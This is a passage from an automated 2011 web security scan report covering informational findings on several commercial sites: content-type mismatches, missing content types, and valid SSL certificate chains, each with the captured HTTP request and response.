Host:   http://www.omniture.com
Path:   /modules/creative_zones/display.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /modules/creative_zones/display.html?sid=lead_form_privacy_include&lang_id=1 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/offer/943?s_osc=30199
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271424|check#true#1303852284|session#1303852218540-851916#1303854084

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 01:10:13 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Tue, 27 Oct 2009 03:24:30 GMT
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:10:13 GMT
Connection: close
Content-Length: 991

document.write('<div id=\'izone_731\'><p style="text-align:left;" class="fineprint">Notice: By supplying my contact information, I authorize Omniture, An Adobe company (Omniture), and its agents ("Omn
...[SNIP]...

29.70. http://www.omniture.com/modules/json/picklist.json.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.omniture.com
Path:   /modules/json/picklist.json.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /modules/json/picklist.json.php?list=form HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/offer/943?s_osc=30199
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; mbox=PC#1303601743323-887111.17#1306269330|check#true#1303850212|session#1303850129880-628856#1303851990|signal-click#productpage_feature-clicked%26mboxTarget%3D34394.4497#1303854916; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 01:16:11 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 05 Apr 2011 21:28:01 GMT
Vary: Accept-Encoding
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Tue, 26 Apr 2011 21:16:11 GMT
Connection: close
Content-Length: 20688

PL_data = ({"australia":[
{"text":"Austrialia Capital Terr","value":"ACT"},
{"text":"New South Wales","value":"NSW"},
{"text":"Queensland","value":"QLD"},
{"text":"South Australia","value":"SA"},
{"te
...[SNIP]...

29.71. http://www.randomhouse.com/art/bw06/base/top_right_corner.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.randomhouse.com
Path:   /art/bw06/base/top_right_corner.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /art/bw06/base/top_right_corner.png HTTP/1.1
Host: www.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:05:54 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.6 mod_fastcgi/2.4.6 mod_perl/2.0.4 Perl/v5.8.7
Last-Modified: Fri, 09 Jan 2009 20:54:28 GMT
Accept-Ranges: bytes
Content-Length: 372
Cache-Control: max-age=31536000
Expires: Wed, 25 Apr 2012 22:05:54 GMT
Content-Type: image/png

GIF89a..R....TTTCCC......!.......,......R......................H........{..L....:)....
.....L*....    ........j.\.....G....-...........F....<..X.8H..W.(w......)..I.5Y.Yu.....    
..J.5Z..u.....
;..K.3[.{s.
...[SNIP]...

29.72. http://www.res-x.com/ws/r2/Resonance.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ws/r2/Resonance.aspx?appid=randomhouse01&tk=686529694590717&ss=212207240983843&sg=1&pg=356199323432520&vr=3.5a&bx=false&ur=http%3A//www.randomhouse.com/&plk=130551;202418;110396;95663;111281;202915;;/210188%7C%7C;/6274%7C%7C;/79977%7C%7C;/168191%7C%7C;/201020%7C%7C;/98142%7C%7C;/212421%7C%7C;/212725%7C%7C;/108336%7C%7C;/2958600%7C%7C;/177036582343365%7C%7C;/201002%7C%7C;/2011%7C%7C;isbn%3D9780375868702%7C%7C;/50477974%7C%7C;isbn%3D9780679867098%7C%7C;isbn%3D9780307590619%7C%7C;/62939519539884000%7C%7C;/62904183661138000%7C%7C;/62891188457456000%7C%7C;&rf= HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=jez55omc3txghh4555mhva55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Tue, 26 Apr 2011 22:05:53 GMT
Set-Cookie: NSC_wjq-Hspvq4=ffffffffc3a01e5245525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 10

<!-- //-->

30. Content type is not specified  previous  next
There are 2 instances of this issue:


30.1. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=12&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1303832151203&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Test%26Target&currencyCode=USD&channel=Products&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1095&browserHeight=937&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&eVar7=%2B1&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 146
Date: Tue, 26 Apr 2011 20:59:08 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferDefault()).loaded();}

30.2. http://realestate.msn.us.intellitxt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyHm3QA-

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"3638-1301049422000"
Last-Modified: Fri, 25 Mar 2011 10:37:02 GMT
Content-Length: 3638
Date: Tue, 26 Apr 2011 18:47:08 GMT
Age: 0
Connection: keep-alive

..............h...&... ..............(....... ...........@...........................B...yK3...........l.[&......}...ytU.........X...........T.n.....|...i:...^F.g...=...[........w].............u.....
...[SNIP]...

31. SSL certificate  previous
There are 3 instances of this issue:


31.1. https://my.omniture.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.omniture.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.omniture.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Thu Jan 20 02:51:32 CST 2011
Valid to:  Sat Mar 23 08:36:07 CDT 2013

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

31.2. https://www.bcbst.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.bcbst.com
Issued by:  Entrust Certification Authority - L1B
Valid from:  Thu Oct 01 07:58:56 CDT 2009
Valid to:  Sat Oct 01 08:28:11 CDT 2011

Certificate chain #1

Issued to:  Entrust Certification Authority - L1B
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Mon Aug 25 13:14:26 CDT 2008
Valid to:  Sat Aug 25 13:44:26 CDT 2018

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Fri Dec 24 11:50:51 CST 1999
Valid to:  Tue Jul 24 09:15:12 CDT 2029

31.3. https://www.freemanco.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.freemanco.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.freemanco.com
Issued by:  Thawte SSL CA
Valid from:  Sun Apr 10 19:00:00 CDT 2011
Valid to:  Thu May 10 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

Report generated by XSS.CX at Tue Oct 18 07:02:54 CDT 2011.